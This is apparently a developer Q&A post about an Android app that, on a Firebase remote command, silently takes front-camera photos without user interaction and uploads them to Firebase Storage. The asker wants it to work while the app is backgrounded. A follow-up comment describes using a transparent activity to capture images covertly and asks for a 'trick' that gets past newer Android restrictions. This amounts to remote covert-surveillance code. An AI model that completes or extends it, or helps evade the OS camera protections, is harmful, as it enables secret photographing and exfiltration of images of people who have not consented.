# Camera cannot take image when app go background but work fine when app in foreground

Tags: android-studio

I am making application which take image from front camera on firebase remote command. App work fine and take picture without user interaction, but when app close or go to foreground, app start giving error that Fail to connect to camera service. As soon as app open it capture the image.

I run foreground service notification which working but still same camera fail error and can not take picture.

```
try {


                    Log.d("kkkk", "Preparing to take photo");

                    Camera.CameraInfo cameraInfo = new Camera.CameraInfo();

                    int frontCamera = cam;
                    //int backCamera=0;

                    Camera.getCameraInfo(frontCamera, cameraInfo);

                    try {
                        camera = Camera.open(frontCamera);
                    } catch (RuntimeException e) {
                        Log.d("kkkk", "Camera not available: " + e.getMessage());
                        camera = null;
//                        takePicture(0);
                    }
                    try {
                        if (null == camera) {
                            Log.d("kkkk", "Could not get camera instance");
                        } else {
                            Log.d("kkkk", "Got the camera, creating the dummy surface texture");
                            try {
                                camera.setPreviewTexture(new SurfaceTexture(0));
                                camera.startPreview();
                            } catch (Exception e) {
                                Log.d("kkkk", "Could not set the surface preview texture");
                                e.printStackTrace();
                            }
                            camera.takePicture(null, null, new Camera.PictureCallback() {

                                @Override
                                public void onPictureTaken(byte[] data, Camera camera) {

                                    Log.d("kkkk", "clicked");



                                    // Encode the byte array into a base64 string
//                                    String imageString = android.util.Base64.encodeToString(imageBytes, android.util.Base64.DEFAULT);
//                                    Log.d("error200", imageString);


                                    FirebaseStorage storage = FirebaseStorage.getInstance();

                                    StorageReference storageRef = storage.getReference();


                                    String path = "images/"+username.toLowerCase()+device.replace(" ","");

                                    StorageReference imageRef = storageRef.child(path);

                                    Bitmap bitmap = BitmapFactory.decodeByteArray(data, 0, data.length); // Replace this with your bitmap image
                                    ByteArrayOutputStream baos = new ByteArrayOutputStream();
                                    bitmap.compress(Bitmap.CompressFormat.JPEG, 10, baos);
                                    byte[] data0 = baos.toByteArray();

                                    UploadTask uploadTask = imageRef.putBytes(data0);
                                    uploadTask.addOnFailureListener(new OnFailureListener() {
                                        @Override
                                        public void onFailure(@NonNull Exception exception) {
                                            // Handle unsuccessful uploads
                                            Log.d("pic","fail"+exception.getMessage());
                                        }
                                    }).addOnSuccessListener(new OnSuccessListener<UploadTask.TaskSnapshot>() {
                                        @Override
                                        public void onSuccess(UploadTask.TaskSnapshot taskSnapshot) {
                                            // Handle successful uploads
                                            Log.d("pic","done");
                                        }
                                    });


                                    camera.release();

                                }
                            });
                        }
                    } catch (Exception e) {
                        camera.release();
                    }


                } catch (Exception e) {
                    Log.d("errorData", e.getMessage());
                }
```

onDestroy method I release the camera but still same error.

````
    @Override
    public void onDestroy() {
        super.onDestroy();

        if (camera != null) {
            camera.stopPreview();
            camera.release();
            camera = null;
        }```
````

Answer (score 0):

Can you add `START_ACTIVITIES_FROM_BACKGROUND` permission in the manifest if you have not added then you need to add this permission for using a camera in the foreground service. But I'm not sure the android newer version supports the used camera without user interaction

Please Refer Official [Android Documentation here](https://developer.android.com/guide/components/foreground-services#test-restrictions)

Comment: I used some trick to capture image when app close. When service fork some event for take image, I open one transparent activity to take picture and it work but in latest android like sdk 31, service is not opening the activity. Can you guide about any trick?